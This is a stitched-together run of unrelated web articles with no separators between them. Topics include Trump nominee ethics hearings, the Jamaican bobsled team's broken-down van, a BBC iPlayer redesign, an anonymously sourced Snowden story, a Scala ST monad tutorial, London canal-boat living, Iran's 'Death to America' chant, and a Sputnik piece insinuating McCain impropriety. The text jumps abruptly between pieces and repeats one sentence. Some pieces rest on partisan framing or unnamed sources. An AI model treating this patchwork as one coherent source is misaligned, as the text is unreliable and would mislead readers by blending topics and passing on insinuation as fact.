Norm Eisen, former White House ethics lawyer to President Barack Obama, and Richard Painter, former ethics lawyer to President George W. Bush, called for the hearings to be postponed until the committees are given proper time to review the nominees' ethics disclosures.
“This is not the way it's supposed to be done and they know it,” Painter said. “When I was in George W. Bush's White House, you didn't send anybody up to the Senate unless you had a complete OGE form and they were approved by OGE.”
When Obama took office, Senate Republicans could threaten the filibuster to demand his nominees disclose information ahead of confirmation hearings and floor votes.
But in response to Republicans' extreme use of the filibuster to prevent Obama from staffing his administration, Senate Democrats in 2013 moved to eliminate it for executive branch nominees. Now that Democrats are no longer in control of the Senate, they don't have any procedural means to prevent those nominees from being confirmed.
“It will be very difficult for us to stop any of these nominations,” Sen. Chris Coons (D-Del.) said Monday on CNN.
The task of vetting the nominees falls then to Republicans, who could step forward to call for a delay in confirmation hearings until ethics disclosures have been filed. But this scenario seems very unlikely.
“It's less about the filibuster and more about the Republican Party having lost the ability to make any kind of decision that isn't a political decision,” said Daniel Schuman, policy director for the progressive group Demand Progress, which is calling for a delay in the hearings until ethics forms are filed.
Senate Majority Leader Mitch McConnell (R-Ky.) is emblematic of this problem. On Sunday, he dismissed calls for the nominees to submit all relevant paperwork before their confirmation hearings as “little procedural complaints.” He further told Senate Democrats to “grow up and get past” their concerns about ethics and conflicts of interest.
McConnell's cavalier attitude toward the ethics process belies the fact that it is Republicans who have the most to lose. “It's not in anybody's interest to confirm a presidential nominee and then have them resign because they violated [the law banning conflicts of interest],” Fischer said.
McConnell's current position is also the opposite of the stance he took in 2009 when Obama was newly elected. In a Feb. 12, 2009, letter to then-Senate Majority Leader Harry Reid (D-Nev.), McConnell called for all relevant financial documents and committee questionnaires to be disclosed to senators before hearings began or committees voted.
“These common sense standards and long standing practices will ensure that the Senate has had the opportunity to fairly review a nominee's record and to make an informed decision prior to a vote,” McConnell wrote.
Now Schumer, the Democrats' leader in the Senate, is hoping McConnell will hold Trump's nominees to the same standard. “Our requests are eminently reasonable, shared by leaders of both parties,” Schumer tweeted on Monday. “I'll return this letter to [McConnell] with the same requests.”
Our requests are eminently reasonable, shared by leaders of both parties. I'll return this letter to @SenateMajLdr with the same requests. pic.twitter.com/IMT7ZtJFjV — Chuck Schumer (@SenSchumer) January 9, 2017
UPDATE: 6:20 p.m. ― Retired Gen. John Kelly reportedly turned in the required disclosures Monday night, less than 24 hours before his hearing before the Senate Homeland Security and Government Affairs Committee.
UPDATE: 6:54 p.m. ― A Trump transition official said late Monday that nominees whose hearings are this week have turned in their paperwork.
The official also issued a statement from the transition, “President-elect Trump is putting together the most qualified administration in history and the transition process is currently running smoothly. In the midst of a historic election where Americans voted to drain the swamp, it is disappointing some have chosen to politicize the process in order to distract from important issues facing our country. This is a disservice to the country and is exactly why voters chose Donald J. Trump as their next president.”
UPDATE: 9:45 p.m. ― An aide to Ben Carson said Carson's paperwork has been submitted.
Perhaps it's the special connection the team has to Calgary, but it didn't take long for the Jamaican bobsled team to find a lift to B.C. after its van broke down in Calgary.
The team was only stranded in the city that provided the backdrop for Cool Runnings for a day after pleas for help and media reports led to a rescue.
Kathleen Pulito, the director of social and digital media for the team, said Driving Force — a vehicle rental and leasing company — is lending them a 12-person van and giving them $2,500 for gas and food.
She said repairs to the team's van would have cost thousands of dollars, money the team does not have.
"Funding is an issue," she said. "We have $1,700 in our account and we have to feed 12 athletes. It's hand to mouth."
The team does not have any stable funding and relies on fundraising and online campaigns in order to keep the sleds sliding.
"Our coaches aren't even here because we can't afford to pay them and they have mouths to feed," she said.
Two new members of the team who had never left Jamaica prior to this adventure drove the now-dead van all the way from New York City before its inglorious ending on a busy city roadway.
The team was picked up on the side of the road in Calgary and made it to the race. David Schnerch, who gave the team a lift, even lent them a vehicle to get around the city while they're here.
Pulito said Calgary is the best place they could break down, but they were in a rush to try and raise money and get back on the road so the team could make a race in Whistler, B.C., on Monday.
The team has a long connection with the city, making its debut in the 1988 winter Olympics here — an unlikely underdog story that was featured in the movie Cool Runnings.
The Jamaican bobsled team is stuck in Calgary after its van broke down. (Getty Images)
That unlikely story continues all these years later.
"It's the Jamaican spirit. They have a lot of pride, a lot of determination," said Pulito when asked why the team carries on despite the odds.
"We're not giving up. They will not give up. As long as we can get funding there will always be a Jamaican bobsled team."
The donation from Driving Force means the team is back on the road, at least as far as Whistler, and has a bit more cash in its pocket. But finances are still tight.
Pulito said there is still an Indiegogo campaign to raise funds to keep the team running.
"Oktoberfest will stay on Fifth street if that's what they intend to do;”
"There's no way I am going to stand by and let the streetcar stop, move or inconvenience the events;”
"If these events want the streetcar operating, well great. ... But if the police chief and city manager decide it's not safe, the solution is to run the streetcar in the Over-the-Rhine piece;”
"There was a culture that I inherited here that thought the streetcar was more important than anything else;”
"I'm a proud runner. ... I ran the Flying Pig Marathon in 2002. Although I'm not in shape anymore;”
"I'm not going to make the Flying Pig Marathon have to give up…;”
"The Chamber of Commerce was being told that they have to move;”
"I'm sending letters out to all these major events. ... We value your event more than we value the streetcar;”
"The culture we inherited here is that the streetcar is the end-all be-all and that is the only thing that matters in this city.”
Patriots Forced To Consider Legal Alternatives Due To Facebook's Inaction
Several California Trump supporters have been the target of online death threats, both on Facebook and Messenger, made by organized groups of illegal immigrants and their followers who have been running a daily attack campaign on patriots like Harim Uziel and Robert Herrera. Early attacks by groups such as “Mexicans Wake Up” and “Real Mexican Problems” consisted mainly of hate speech, insults, and requests to report their pages to FB to get these patriots blocked. These campaigns succeeded in getting both of these gentlemen blocked, and yet the attacks continued, now targeting back up pages and known associates.
Recently the attacks have escalated to direct death threats and threats of physical harm. Below are screen shots of just a sample of the many open threats by members of these groups. They intentionally use gang code, such as the term “green light”, a phrase used by gang members to refer to an ‘authorized' gang hit, or person with a murder contract on their head.
While these posts have been reported by many angry FB users who want to see Facebook's stated standard of “No Threats” be enforced, many of these posts are reviewed by FB and allowed to remain. Perhaps FB was confused by gang lingo, or maybe they just only enforce the rules for Liberals. This author is prone to believe the latter.
If you are a Trump supporter or a conservative, you have likely experienced Facebook's liberal bias. Hate speech by the left against Trumpers when reported is deemed to “not violate FB community standards” while nearly every strong right wing opinion is deemed a violation. Conservatives are often banned by FB, or as it is known, “put in Facbook jail”, an experience so common on the right as to be a badge of honor and sign of right wing passion. The Left does not receive the same treatment, as we all know. Ask any liberal on Facebook if they know what “Facebook Jail” is and most will not have any clue.
The liberal bias on FB is now, however, taking a potentially dangerous and deadly turn. FB will not stop these group pages that engage in daily threats and doxxing, and the threats are escalating. Members of these groups have started sending private messages with the current addresses of these besieged patriots. Several members have made threats that are not removed by FB, and when Facebook does remove a post, they still REFUSE to close down these groups so the cycle of threats continues. With the potential involvement of gangs and “green light” death threats, our fellow patriots are forced to take the matter to law enforcement and try to protect themselves.
Facebook doesn't seem to care if they live or die. I guess the “community” only matters if you are on the left and Facebook policy is apparently “Conservative Lives DON'T Matter”. Shame on you, Zuckerberg. I call on all patriots to insist Facebook enforce its policy fairly and protect both liberals AND conservatives from threats of harm. Report ANY threats of violence and the pages they come from, and follow up with further demands to address their biased policy when they fail to remove posts that clearly violate posted FB standards. And let them know one thing:
If Facebook doesn't protect Trump supporters maybe it's time we should leave.
Hello, I'm Dan Taylor, Head of BBC iPlayer and today I'm delighted to share how we are evolving BBC iPlayer for the multiscreen world, starting today with the rollout of a new version for computers, tablets, mobiles and connected TVs. Just over six years ago, on Christmas Day 2007, we launched BBC iPlayer, offering users the opportunity to catch-up with the last 7 days of BBC programming via their computer. Fast forward to now and BBC iPlayer is available on over 1,000 different devices and serves 10 million programme requests a day. It now offers more than just catch-up, with live streaming, archive collections, exclusives and premieres. We've also introduced innovative new features such as mobile downloads, enabling you to watch offline and on the go, and Live Restart, enabling you to jump back to the start of a programme while it's being broadcast. It's a measure of how loved BBC iPlayer now is that it's the number one brand in the UK according to YouGov's BrandIndex Ranking. However there's always room for improvement and following extensive research and user testing, we are today rolling out a new web version of BBC iPlayer (accessible via bbc.co.uk/iplayer on computers, tablets and smart phones) and a new TV version (accessible via the existing BBC iPlayer app on a range of connected TV devices). The BBC iPlayer mobile and tablet apps will be updated with the new interface in the coming months. The new iPlayer has been designed for a multiscreen world, so the experience is consistent, but optimised across PC, tablet, mobile and TV devices and we've built it in such a way that we can rapidly develop and release new features across those four screens.
The new BBC iPlayer on tablet, smart phone, TV and computer
The new web version of iPlayer has been developed using responsive design, which means we can deliver the iPlayer experience to multiple different screen sizes without building separate versions. It also means that if I share a link to iPlayer from my computer, it will work just fine if you open it on your mobile or tablet browser. A major focus of this release is making it easier to find something to watch, helping you quickly and easily find the programmes you know you're looking for and, crucially, helping you discover something new. The current iPlayer's pretty good if you know what you want to watch, but we know that 42% of visitors are now coming without a particular programme in mind. Home screen With that in mind, we've created a brand-new home screen that's simpler, more visual and easier to browse. There's a consistent navigation bar along the top, providing easy access to channels and categories. There's a ‘Find tools' panel, of which more later. However the majority of the screen is dedicated to an image-led browsing experience.
The home screen of the new BBC iPlayer on a computer
Hovering over a programme image provides a short description of the episode along with its duration and when it was first shown - simple information that users have told us they find useful in selecting a programme to watch. Channels It's not just the homepage in new iPlayer which offers this new image-led browsing experience. We've also developed such pages for each of our TV channels, creating a place to discover and enjoy the best those channels have to offer even when they're off air, complementing the more traditional schedule view.
The CBeebies channel in new BBC iPlayer
Categories We've created a similar browsing experience for categories and responded to user feedback by replacing the Factual genre with genres which users talk about when describing their TV viewing habits: Documentaries, Food, Arts, History, Science & Nature. These categories showcase the range of catch-up, archive, exclusives and premieres – all forms of TV content in one place.
The Music category in new BBC iPlayer
And it's not just genres. There are also categories for Audio Described and Signed content and for Northern Ireland, Scotland and Wales, showcasing the best programmes from and about those nations. In addition to the highlights view, each category also offers a full A-Z list, which details every programme in that category. Collections Collections are a brand-new addition to BBC iPlayer which aid programme discovery by grouping programmes by series, season, event or theme. BBC Four has been releasing themed archive collections for the last few years but they've been difficult to find in iPlayer. The new iPlayer enables us to showcase those collections on an ongoing basis.
BBC FOUR Post-War Architecture Collection
Playback Of course, watching programmes is the beating heart of iPlayer and we've optimised the new playback page for what users are looking to do before, during and after viewing.
New playback page
Beforehand, we present all the key information you need to decide whether to watch and provide simple navigation to other episodes from the same series, in case you were after a different one. Once you hit play, we dim the lights and get out of your way. The new web version of iPlayer makes use of the BBC's new Standard Media Player which, as well as providing our best ever playback experience across screens, also enables us to develop plug-ins to enhance the playback experience. For example, if you're enjoying a programme and decide you don't want to miss out on future episodes you can now add it to your Favourites without leaving the playback experience. At the end of an episode, if the next episode in the series is available, we'll cue it up. We'll also always offer you suggestions of other programmes you may also like, powered by a new and improved recommendation engine.
Onward journeys from playback
This panel will also include onward journeys to other relevant content on BBC Online, such as BBC iWonder guides. Find tools We've not forgotten about the 58% of users who arrive knowing exactly what they're looking for, with the introduction of Find tools. First, we have the ‘Find a Programme' box, which not only remembers your recent searches, but also suggests what you might be looking for as soon as you start typing. So, if I type ‘E' I can get straight to EastEnders.
The Find A Programme box suggests what you might be looking for
Next we have the A-Z Programme List, which does exactly what it says on the tin. We know many users really value the A-Z as a simple way of scanning the full iPlayer inventory.
And finally, a Recently Watched section which remembers what you've watched recently so you can quickly and easily resume watching a programme you were a part way through or find new episodes of a series you've been enjoying.
Former National Security Agency contractor Edward Snowden stole vastly more information than previously speculated, and is holding it at ransom for his own protection.
“What's floating is so dangerous, we'd be behind for twenty years in terms of access (if it were to be leaked),” a ranking Department of Defense official told the Daily Caller.
“He stole everything — literally everything,” the official said.
Last month British and U.S. intelligence officials speculated Snowden had in his possession a “doomsday cache” of intelligence information, including the names of undercover intelligence personnel stationed around the world.
“Sources briefed on the matter” told Reuters that such a cache could be used as an insurance policy in the event Snowden was captured, and that, “the worst was yet to come.”
The officials cited no hard evidence of such a cache, but indicated it was a possible worst-case-scenario. Some version of that scenario appears to have come true.
“It's only accessible for a few hours a day, and is triple encrypted to the point where no one can break it,” the official said of the data cloud where Snowden has likely hidden the information.
According to the official, there are at least two others in possession of the code to access the information, and, “if we nail him — he'll release the data.”
“Everything you don't want the enemy to know, he has,” the official said. “Who we're listening to, what we're after — they'd shut us down.”
The damage would be “of biblical proportions,” the official said.
Another official from the NSA task force commissioned to assess the data stolen and leaked by Snowden said on television recently that granting Snowden amnesty is “worth having a conversation about” in order to secure any potential stolen data.
Director of the NSA Gen. Keith Alexander said on “60 Minutes” Sunday that he opposes the idea, and said that people need to be held accountable for their actions. The White House stated Monday it would not be changing its policy regarding Snowden.
The NSA director has repeatedly testified before Congress about the revealed programs, and continues to state that the leaks have compromised U.S. national security.
Alexander announced in October he would be retiring as NSA director and head of U.S. Cyber Command effective March, and a recent White House task force charged with improving NSA transparency has suggested appointing a civilian head to steer the signals intelligence agency.
The official said that following Alexander's retirement, he doesn't “know how (the amnesty conversation) is going to play out.”
Follow Giuseppe on Twitter
The State
Texas Rep. Ron Paul is well ahead of Texas governor Rick Perry, according to the latest poll conduced by Azimuth Research Group which finds Mr. Paul leading Mr. Perry in their home state of Texas.
Answering the question, “If the Texas Republican primary were held today, which presidential candidate would you be most likely to vote for?” 22 percent of those polled selected Mr. Paul. Just 17 percent of respondents voted in favor of Mr. Perry.
The poll comes just days after Mr. Perry announced his intention to seek the Republican presidential nomination. The Texas Republican governor had hinted at an entry earlier this year, testing levels of support for his candidacy.
Speaking earlier in the week, Mr. Paul lambasted Mr. Perry, saying the Texas Republican is an extension of the Republican establishment.
“[Governor Perry] is getting into the race, I think, doesn't bother me at all, obviously because he pretty much represents the status quo. And the other candidates, in one way or the other, are part of the status quo. And I represent something different,” Mr. Paul said.
---
Meanwhile Ron Paul is trending 4th of all internet topics on Alexa.
And check out the following from yesterday's links.
Recent stories:
Referentially Transparent Mutable State
In their paper “Lazy Functional State Threads”, John Launchbury and Simon Peyton-Jones present a way of securely encapsulating stateful computations that manipulate mutable objects. The result is Haskell's ST monad. Its definition is very similar to the State data type. In Haskell, the ST monad is used to thread the manipulation of mutable state in such a way that the mutation is completely referentially transparent, because it is a type error for a mutable object to escape the monad.
I would like to present an implementation of this in Scala, which I recently committed to the Scalaz library. I was inspired to write this by Tim Carstens last summer, but never found a way of encoding the requisite rank-2 types in Scala's type system in such a way that what should work does and what shouldn't. But Geoff Washburn got me going again. Following the technique on his blog, of representing universal quantifiers as doubly negated existentials, I was able to encode ST in a way that's surprisingly nice to use, and actually does give you type errors if you try to access a naked mutable reference. And as Mark Harrah has pointed out, we end up not having to use the double negation after all. I'm surprised to find that doing this in the obvious way in Scala, just works.
OK, let's get to the money. In Scala, we can declare the ST data type as follows:
case class World[A]() case class ST[S, A](f: World[S] => (World[S], A)) { def apply(s: World[S]) = f(s) def flatMap[B](g: A => ST[S, B]): ST[S, B] = ST(s => f(s) match { case (ns, a) => g(a)(ns) }) def map[B](g: A => B): ST[S, B] = ST(s => f(s) match { case (ns, a) => (ns, g(a)) }) } def returnST[S, A](a: => A): ST[S, A] = ST(s => (s, a))
This is a monad in the obvious way. The flatMap method is monadic bind and returnST is monadic unit.
The World type represents some state of the world, and the ST type encapsulates a state transformer which receives the state of the world and returns a value which depends on that state together with a new state. Here, we are representing the world state by nothing at all. It turns out that for what we want to do with the ST monad, the contents of the state are not important, but its type very much is. A much more detailed explanation of how and why this works is given in the paper, but the punchline is that we are going to “transform the state” by mutating objects in place, and in spite of this the state transformer is going to be a pure function. This is achieved by guaranteeing that the type S for a given state transformer is unique. More on that in a second.
Purely Functional Mutable References
A simple object that we can mutate in place is one that holds a reference to another object through a mutable variable.
case class STRef[S, A](a: A) { private var value: A = a def read: ST[S, A] = returnST(value) def write(a: A): ST[S, STRef[S, A]] = ST((s: World[S]) => {value = a; (s, this)}) def mod[B](f: A => A): ST[S, STRef[S, A]] = for { a <- read v <- write(f(a)) } yield v } def newVar(a: => A) = returnST(STRef(a))
So we have monadic combinators to construct, read, write, and modify references. Note that the implementation of write blatantly mutates the object in place. The definition of mod shows how to compose state transformers in sequence, using monad comprehensions.
It's important that an STRef is parameterized on a type S which represents the state thread that created it. This makes variables allocated by different state threads have incompatible types. Therefore, state threads cannot ever see each other's mutable variables. Because state transformers can only be composed sequentially (with flatMap ), it's guaranteed that two of them can never simultaneously mutate the same STRef.
Running a State Transformer as a Pure Function
Note that the type of reference to a value of type A in a state thread S is ST[S, STRef[S, A]] . If ST had a run function of type ST[S, A] => A , we would be able to get the reference out. But this type is more general than we want. What we want is for the compiler to reject code like newVar(10).run , which would give you access to the naked STRef, but to accept code like newVar(10).flatMap(_.mod(x => x + 1).flatMap(read)).run , which simply accesses an integer.
In Haskell, the type of runST is:
runST :: forall a. (forall s. ST s a) -> a .
This is a rank-2 type which Scala's type system does not directly support.
To see why this type would prevent the leaking of a mutable reference, consider the type you would need in order to get an STRef out of the ST monad.
forall a. (forall s. ST s (STRef s a)) -> STRef ??? a
What type should go in place of the three question marks? There is no type that could possibly fit the bill because the type s is bound (introduced) by the universal quantifier to the left of the arrow. It's a local type variable in the domain of the function, so it can't escape to the codomain. This is why ST state transformers are referentially transparent.
Of course, if you get the value out of a reference, then you can run that just fine. In Scala terms, you can always go from ST[S, A] to A , but you can never go from ST[S, F[S]] to F[S] for any F[_] .
Writing runST in Scala
So the problem becomes how to represent a rank-2 polymorphic type in Scala. I've shown before how we can represent a rank-2 function type by encoding it as a natural transformation. And Mark has posted on how to write natural transformations using universally quantified values. (And I just now realized that he's using functional state threads for non-observable mutation!)
First, we need a representation of universally quantified values:
trait Forall[P[_]] { def apply[A]: P[A] }
Now that we have rank-2 polymorphism, the implementation of runST is straightforward:
def runST[A](f: Forall[({type λ[S] = ST[S, A]})#λ]): A = f.apply.f(realWorld)._2
I'm using the “type lambda” trick here to declare the type constructor inline. The realWorld object is just a dummy value.
Some Examples
Here's a simple example of a computation that creates a mutable reference and mutates it:
def e1[S]: ST[S, STRef[S, Int]] = for { r <- newVar[S, Int](0) x <- r.mod(_ + 1) } yield x
And this expression creates a reference, mutates it, and then reads the value out:
def e2[A] = e1[A].flatMap(_.read)
Running the latter expression is fine, since it just returns an Int:
runST(new Forall[A] { def apply[A] = e2 })
But running the former fails at compile-time because it exposes a mutable reference. Or rather, because when the compiler tries to unify with our existential type, it's out of scope:
runST(new Forall[({type λ[S] = ST[S, STRef[S, Int]]})#λ] { def apply[A] = e1 }) found : scalaz.Forall[[S(in type λ)]scalaz.ST[S(in type λ),scalaz.STRef[S(in type λ),Int]]] required: scalaz.Forall[[S(in type λ)]scalaz.ST[S(in type λ),scalaz.STRef[_ >: (some other)S(in type λ) with (some other)S(in type λ), Int]]]
What are the practical implications of this kind of compile-time checking? I will just quote Peyton-Jones and Launchbury:
It is possible to encapsulate stateful computations so that they appear to the rest of the program as pure (stateless) functions which are guaranteed by the type system to have no interactions whatever with other computations, whether stateful or otherwise (except via the values of arguments and results, of course). Complete safety is maintained by this encapsulation. A program may contain an arbitrary number of stateful sub-computations, each simultaneously active, without concern that a mutable object from one might be mutated by another.
This can be taken much further than these simple examples. In Scalaz, we have STArrays, which are purely functional mutable arrays. There's an example of a pure binsort which uses a mutable array for sorting.
This technique can be extrapolated to implement Monadic Regions (currently underway for Scalaz), which allows compile-time tracking of not just mutable arrays and references, but file handles, database connections, and any other resource we care to track.
What we have here then is essentially the beginnings of an effect system for Scala. This allows us to compose programs from referentially transparent components which are internally implemented with mutation and effects, while those effects are guaranteed by the type system to be transparent to the rest of the program.
Advertisements
London's Little Venice Dan Breckwoldt / Shutterstock.com
As rents soar and technology makes life onboard easier, more Londoners like me are taking up residence on the city's canals.
One weekend afternoon about a month after I moved aboard a canal boat in London, there was a rap-rap-rap on the wood and metal paneling of my front door. I had left it partly open to let in the breeze, and a woman was peeking in like a tentative cat. “Excuse me, do you live around here?” she asked. We were docked at Little Venice, a busy hub for tourists just a short walk north of Hyde Park. I said yes. She seemed confused, and pointing toward nearby Paddington, she asked again, “You mean, you live around here?” I noticed two more faces peeking around the door. “No,” I said, pointing to the floor in the middle of my living room. “I live here.” Series City Makers: Global Shifts Go The visitors—Finnish tourists—had been touring London's canals. I invited them in, happy to let them take photos, and in an attempt to impress them with the modernity of boat living, told them that the Internet onboard (tethered to my phone) was faster than in any of the three London flats I'd lived in. Unimpressed, they wanted to know how many knots I could tie.
None, I told them. The only thing I knew about boats when I moved onboard in August was that I wanted to live on one. The U.K. capital has more than 100 miles of waterways (not including the Thames River). Over the past four years, the number of people living on boats that ply them has risen by more than 50 percent. In March 2015, there were 3,255 narrow boats on London waterways, about two-thirds of them permanently docked in small marinas around the city. The other 1,225—up from 638 in March 2011—travel up and down the canals and dock where they please for up to two weeks at a time, mostly along the stretch of canals north of and roughly parallel to the Thames.
Two factors are behind the mini-boom: housing costs in central London spiraling out of reach, and recent technological advances like solar panels, LED lights, and mobile Internet connections that allow people to live aboard with modern conveniences. My boat is a floating one-bedroom flat with a deck, living room, and kitchen at the front; a bathroom and shower in the middle; and a bedroom at the back. A tank in the bow provides water for the kitchen sink and shower, and two adjacent gas tanks power the boiler and kitchen stove. I refill them every four to six weeks, with water from one of the service stations run by the Canal and River Trust, and with gas from a commercial boat cruising the city. Electricity comes from the boat's central battery. To use it, I have to flip on a switch, and then switch it off when I'm done to avoid draining the battery (a disaster). Electricity comes from the boat's central battery. To use it, I have to flip on a switch, and then switch it off when I'm done to avoid draining the battery (a disaster). Solar panels on my top deck—the same deck where I like to sunbathe—recharge the battery in the daytime, and even soak up some power on London's many rainy days. One of my current neighbors, Fergus Carr, an architect, says his first encounter with canal boats was in 2012, when he and his partner chanced upon the Canalway Cavalcade, a yearly festival in Little Venice, where the Grand Union Canal and Regent's Canal meet.
“We were just on a walk, because we lived nearby in North London, and we came upon all these people on boats and just thought, ‘This is incredible.'” They began investigating houseboat living after a visit to a friend's narrow boat and decided to try it. They bought their boat for £16,000 (about $24,000) in southern England this summer and sailed it to the capital, crossing the quick-flowing, tidal Thames during the journey—a feat of planning, since narrow boats can only reach a speed of about 4 kilometers (2.5 miles) an hour and can't travel against the current. They spend £20 per month on gas and diesel and their license fees are £745 a year. Cities are changing fast. Keep up with the CityLab Daily newsletter. The best way to follow issues you care about. Subscribe Loading... Carr's parents, who had discouraged him from the plan (“Just save up for a flat!”), are now in the process of moving aboard their own boat. Built during the Industrial Revolution to transport coal and timber around the city, and made obsolete by the rise of the railways and then roads, London's canals suffered a long decline over the 20th century. By mid-century, many were in disrepair and overflowing with garbage. A few closed, and a cleanup effort in the 1970s dredged those that remained. But it failed to revive the canals' reputation. As recently as a decade ago, some sections were “considered no-go areas,” according to Jon Privett. Privett moved into his first boat in 2000, when there were only “about 40 boats in London without [permanent] moorings.” The waterways weren't very busy, but were fun, he says, because all the boat residents knew each other. “Now there's a kind of safety in numbers,” he says. “And it's a lot more like living in a house.” (A house where you switch off the water between rinsing each plate when doing dishes, I'd add.) In 2011, Privett opened London's first—and only—bookstore on a boat, called Word on the Water. On my first weekend after arriving in the city last November, my partner and I walked the west end of London's canals while looking for a place to live. We came across a barge overflowing with books, a saxophonist playing on the upper deck. Smoke curled out from the boat's chimney. In the back, two children read near the fireplace. It was warm inside, and I wanted to stay.
Officially, we are borrowing a friend's boat for the next year … and paying him for the privilege, about 40 percent of the cost of a similar apartment in the area. To legally rent a boat out, an owner must have a permanent mooring (scarce in the city) and a particular type of business license. As a result, there isn't a real rental market; most live-aboards own their crafts. The Canal and River Trust advises people not to see boats as a cheap housing alternative, warning of “hidden costs and maintenance jobs.” For me, these include never using my onboard fridge (it drains the battery), putting a lot of time and effort into heating, and moving twice a month. About a third of London's canal boats, including ours, run on “continuous cruising licenses,” requiring them to move every two weeks so they don't monopolize access to the canals. I've cruised from West London through Notting Hill, past waterside cafes and underneath the London Zoo's bird enclosures, along opulent Primrose Hill mansions and touristy Camden Market. I've docked yards away from concerts I'm attending in East London. I've also docked three boats abreast for several days at a time, and had to climb across two boats to get to my own. I've run out of dry wood on one of the first cold days of the winter, and cursed everything, including my own lack of preparation. “Our advice,” says Fran Read, the Trust's national press officer, “is that you should only live on a boat if you love the lifestyle—not because you think it will save you money.” Top image: Dan Breckwoldt / Shutterstock.com
In Iran there is a growing push to eliminate the “Death to America” chant that has long been a staple of Friday Prayers and other public outings.
With the exception of the immediate aftermath of 9/11, when the streets of Tehran filled with mourners, Friday Prayers in major cities of Iran have featured a “Death to America” chant since the U.S. and Iran broke off diplomatic relations during the hostage crisis. These chants and Iranian political leaders referring to the U.S. as the “Great Satan” have often been used in the West to argue that the Islamic Republic of Iran is inexorably hostile to the U.S. and the West.
Perhaps cognizant of this, some are now pushing for the phrase to be eliminated from Iranian public discourse.
Most notably, early last week former President, Akbar Hashemi Rafsanjani posted a note to his website claiming the Grand Ayatollah Ruhollah Khomeini, the founder of the Revolution, had agreed with Rafsanjani that the use of the “Death to” chants, including “Death to America,” should be discontinued. Since Khomeini's death in 1989, Rafsanjani, who was a close confidante of Khomeini, has often recalled private conversations between the two about controversial topics such as who should succeed Khomeini.
Rafsanjani's website posting was widely covered in the Iranian press last week. Many outlets noted that no one besides Rafsanjani had heard Khomeini denounce the death to chants. However, not long before Rafsanjani's posting, an undated quote from Mohammad Taghi Rahbar, Esfahan's Friday Prayer leader and a former parliamentarian, surfaced in which Rahbar reportedly suggested that the use of the “Death of America” chant shouldn't have to continue forever.
Then, immediately following Rafsanjani's statement, an op-ed from a popular newspaper editor appeared in which the author, Mehrdad Khadir raised the possibility that the thawing of ties between Iran and the U.S. could spell the end to the chant. In the article, Khadir discusses the lineage of the “Death to America” chant, noting that it was not a founding revolutionary slogan but only appeared after tensions with the U.S. deteriorated in the months afterward. Initially, the chant was only “Death to Arrogance.”
Khadir goes on to note that other individuals (such as exiled Iranian politicians and Saddam Hussein) and countries (such as the Soviet Union and China) had previously been included alongside the U.S. in the “Death to” chant, only to be eliminated from the chant after tensions thawed (or the individuals were killed). Khadir hypothesizes that an improvement in ties with the U.S. could lead the chant to return to the original, ambiguous Death to Arrogance chant (apparently, not calling for the “Death to” anything at a Friday Prayer is a step too far.)
Last Friday it initially appeared that hardliners in the regime intended to push back against the calls for the cessation of “Death to America” chants.
Specifically, Expediency Discernment Council Member, Mohammad Hossein Saffar Harandi, who also serves as an advisor to the commander of the Islamic Revolutionary Guards Corps (IRGC), embraced the chant when he was introducing the Friday Prayer leader in Tehran. According to Iranian media reports, as reported by AEI's Iran Tracker, after Harandi questioned Rouhani's outreach to the U.S. during the UN General Assembly week in New York, attendees to the Friday Prayer began chanting Death to America. Harandi reportedly responded to these chants by saying:
“This anger is due to the past memories of these people, and this can be our message. Of course the chant of Death to America has been and will be reinforced over time, because the people have daggers of Americans in the chest, back, and throat of their children. These past memories are added to their treacherous designs [hidden] behind their diplomatic front. Behind the apparent friendliness, their hostility continues.”
Interestingly, Harandi quickly denounced these initial media reports, claiming that they had reported the facts incorrectly. According to Harandi's account, after the spontaneous chants of “Death to America” began, “I said I call on you to stop chanting,” but noted that the reason people were chanting this was because they are angry at America's actions today.
Harandi then continued:
“These days our people have hoped for the opening of a path under the title of ‘heroic flexibility' that leads to the realization of their demands…. We have certainly been waiting. On November 4th of this year [the anniversary of the Iranian hostage crisis] , the people's chants will resonate more loudly than the past, and this will be completely affected by the conduct that Americans may show in the coming days during the progress of negotiations.”
Thus, Harandi is suggesting that if America's stance toward Iran changes, he does not expect these chants to continue (although he doesn't expect America's position toward Iran to change.)
More importantly, the fact that Harandi felt compelled to quickly denounce the reports suggest that the powers that be in Iran may be contemplating an end to the “Death to America” chant.
Senator John McCain's foundations and political endeavors deserve to be thoroughly scrutinized, Wall Street analyst Charles Ortel told Sputnik, sharing his views on what is behind a more than decade-long cooperation between the Arizona senator and US billionaire George Soros.
There is one thing Republican Arizona Senator John McCain and the Clintons definitely have in common — their passion for power games.
Ortel, who has been looking into the Clintons Foundation's alleged fraud for the past few years, told Sputnik that the McCain-hosted annual Sedona Forum, the Clinton Global Initiative (CGI) and other private gatherings which bring together senior foreign officials and American serving politicians "seem highly suspect" and "deserve tough scrutiny" concerning "related party transactions" that likely are created behind closed doors at such events.
The McCain Institute for International Leadership
The McCain Institute for International Leadership at Arizona State University (ASU) was founded in 2012 with $8.7 million in funds leftover from McCain's 2008 futile presidential campaign.
In the introduction video, Michael M. Crow, the ASU president explains that "in the spirit of John McCain himself and the spirit of multiple generations of the McCain family, The McCain Institute for International Leadership… is an opportunity to step out and depart from the standard think tank model," which means that they are "not sitting and talking about things" but "facilitate the making of decisions."
© AFP 2018 / SERGEI SUPINSKY McCain: Mattis' Ukraine Visit Opportunity to Provide Lethal Assistance
The departure from "the standard think tank model" could be seen in the Institute's unwillingness to disclose the amount of donations made by its most generous foreign donors, as The Daily Caller's investigative journalist Richard Pollock found in his July report
Pollock pointed out that the Institute's web site "only lists donors who have given '$100,000 and above,' which can be misleading," especially given Bloomberg's 2016 disclosure that the non-profit "with ties to Senator John McCain" received "a $1 million donation from the government of Saudi Arabia in 2014, according to documents filed with the US Internal Revenue Service."
The embarrassing revelation coincided with McCain seeking his sixth term in the US Senate prompting the politician to vehemently deny that he had anything to do with The McCain Institute "except that they use [his] name."
To add to the confusion, the senator rushed to cut off questions about the Saudi donation to the non-profit asked by Arizona broadcaster, KPNX Channel 12.
According to Ortel, McCain's words didn't sound convincing. It is no secret that foreign actors seeking to get along with current US politicians sometimes donate money to non-profits somehow linked to these policymakers.
"John McCain does love his foreign adventures and does cultivate foreign government (and wealthy individual) contributions," Ortel says, "Now, if the McCain Institute were in Arkansas or Bosnia, rather than Arizona, I might find his denials potentially plausible, but two words leap to mind: 'Come on!'"
© AP Photo / Matt Dunham Why Foreign Gov'ts Seem Reluctant to Expose Clintons' Alleged Fraud
The analyst stressed that he finds this Saudi sponsorship "deeply disturbing" especially given McCain's role in the Senate on a key committee [Committee on Armed Services]," since it amounts to a probable conflict of interest.
